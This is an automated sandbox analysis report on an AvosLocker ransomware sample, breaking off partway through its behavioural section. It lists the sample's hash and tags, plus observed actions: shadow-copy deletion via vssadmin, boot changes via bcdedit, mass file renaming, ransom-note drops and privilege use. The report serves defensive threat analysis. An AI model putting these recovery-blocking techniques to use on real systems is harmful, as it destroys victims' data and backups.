Malware Analysis Report

2024-10-16 03:28

Sample ID 240529-hycdjsed9t
Target 00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f
SHA256 00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f
Tags
avoslocker defense_evasion evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f

Threat Level: Known bad

The file 00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion evasion execution impact ransomware

Avoslocker Ransomware

Deletes shadow copies

Renames multiple (8462) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (10383) files with added filename extension

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Command and Scripting Interpreter: PowerShell

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 07:08

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 07:08

Reported

2024-05-29 07:10

Platform

win7-20240221-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (10383) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2090100087.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Americana\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_K_COL.HXK C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Internet Explorer\it-IT\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00494_.WMF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\de-DE\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\gadget.xml C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR22F.GIF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis.css C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Microsoft Games\Purble Place\fr-FR\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sr.pak C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\calendar.html C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR17F.GIF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN00010_.WMF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Common Files\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10267_.GIF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00656_.WMF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\js\settings.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.DEV_K_COL.HXK C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215709.WMF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATALOG.DPV C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL096.XML C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099165.JPG C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\js\cpu.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\css\settings.css C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Windows Media Player\en-US\mpvis.dll.mui C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2088 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 2088 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1912 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1912 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1912 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
